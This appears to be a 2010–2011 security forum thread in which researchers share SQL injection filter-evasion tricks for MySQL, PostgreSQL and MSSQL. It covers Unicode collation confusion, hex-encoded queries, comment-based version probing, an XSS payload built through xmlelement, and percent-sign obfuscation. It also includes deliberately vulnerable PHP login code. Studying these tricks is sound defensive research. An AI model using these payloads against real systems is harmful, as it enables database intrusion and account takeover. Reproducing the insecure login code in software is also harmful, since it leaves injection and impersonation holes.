Just released a small walkthrough for some filters:
http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
I would love to see a lot more about SQL filter evasion/obfuscation in this forum although I have to admit that JS is just designed for obfuscation.



Edited 1 time(s). Last edit at 03/19/2010 09:56AM by Reiners.

Quote

I would love to see a lot more about SQL filter evasion

INSERT INTO contests (contest) VALUES('crazy contest ideas')

#Found no rows
SELECT COUNT(*) FROM contests WHERE ContestType = 'SQL' AND User = 'Reiners'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's a small start - MySQL and Unicode - big fun:
http://dev.mysql.com/doc/refman/5.1/en/charset-unicode-sets.html

SELECT 'Ä'='A'; #1
SELECT 'Ã'='A'; #1

SELECT * FROM test WHERE name = 'ädMЇň'; //imagine entities in canonical form

SELECT*FROM(test)WHERE(name)IN(_ucs2 0x01df010e004d00cf0148);

Or the XML way:

SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

@mario: could be useful if the application checks for an already registered user not in SQL but hardcoded in the app:

<?php
// register.php

$user = mysql_real_escape_string($_GET['user']);
$pass = mysql_real_escape_string($_GET['pass']);

if(trim($user) == "admin")
{
	exit("admin already exists");
} 

$result = mysql_query("INSERT INTO users (name, pass) VALUES ('".$user."','".$pass."'");
?>

<?php
// admin.php

$pass = mysql_real_escape_string($_GET['pass']);

$result = mysql_query("SELECT * FROM users WHERE user = 'admin' AND pass = '".$pass."'");

if($data = @mysql_fetch_array($result))
{
	echo "Welcome admin";
}
?>

but unlike stefan essers column truncation attack this will not work when the username is checked against the database.

Indeed, I've been fooling around with this a bit myself, but so far only have found my testing app to be vulnerable.

I have two users with the same name in the DB, manes and mÁnes, both have different passwords. The query goes something like this:
$userrow = mysql_query("SELECT user FROM `Test` WHERE `user` = '" . mysql_real_escape_string($_POST['username']) . "' AND `passwd` = '" . md5($_POST['password']) . "';");
if(mysql_num_rows($userrow) != "1"){
echo "<font color='red'><b>Wrong username or password!</b></font>";
include "login.php";
} else {
$_SESSION['user'] = $_POST['username'];
header('Location: index.php');
}

If I log in with username manes, but using the password for mÁnes, it will log me in as the original manes. I tried adding DISTINCT, LIMIT 1, ORDER BY to circumvent this, but it only seemed to affect the results I got through MySQL console, my web app remained vulnerable. I went on to test this with another PHP app I downloaded, similar query:

$qry="SELECT * FROM members WHERE login='$login' AND passwd='".md5($_POST['password'])."'";
$result=mysql_query($qry);
//Check whether the query was successful or not
if($result) {
if(mysql_num_rows($result) == 1) {
//Login Successful

But this time, it didn't matter which username I used (manes/mÁnes), it logged my in by the password I used... Also, SMF 1.1 allowed me to register both users, however would only let me log onto my original one.



Edited 1 time(s). Last edit at 03/20/2010 06:46PM by lightos.

Just stumbled upon this - major version detection w/o @ or parenthesis:

SELECT--/*!500005#*//*!400004#*//*!300003#*/

Or some PostgreSQL fun - useful for SQLI based XSS (and yes - that does make sense if you really think about it lol)

SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror))

Nice link thanks!

conditional errors with regexp under mysql for filter evasion
http://websec.wordpress.com/2010/05/07/exploiting-hard-filtered-sql-injections-2-conditional-errors/

just to have it added in this thread as well:


- functions can be called with lots of spaces before parenthesis: SELECT ascii (1)
- there can be a lot of bullshit in this part and the syntax is still valid:
select(name) `bullshit bullshit bullshit`from users
select name `bullshit bullshit bullshit` from users
- this works as well:
select`name`buuullshit from users
select name buuullshit from users

edit:
just to have it in this thread:
SQLi filter evasion cheatsheet for MySQL



Edited 2 time(s). Last edit at 04/06/2011 02:03PM by Reiners.

A little trick that works with MSSQL and ASP. Nothing new, but still neat.

%S%E%L%E%C%T 1

Basically, you can add the percentage sign in between characters and the query is still valid.



Edited 1 time(s). Last edit at 03/21/2011 04:18AM by lightos.

Nice! and added...

[hackvertor.co.uk]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/21/2011 07:50AM by Gareth Heyes.

another weird MySQL alias behavior (\N = null):

SELECT \Nfooooobar_123

nice for confusion:

SELECT\NOTHING



Edited 1 time(s). Last edit at 06/23/2011 05:27PM by Reiners.

Sweeeeet mysql is like js for weird syntax

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]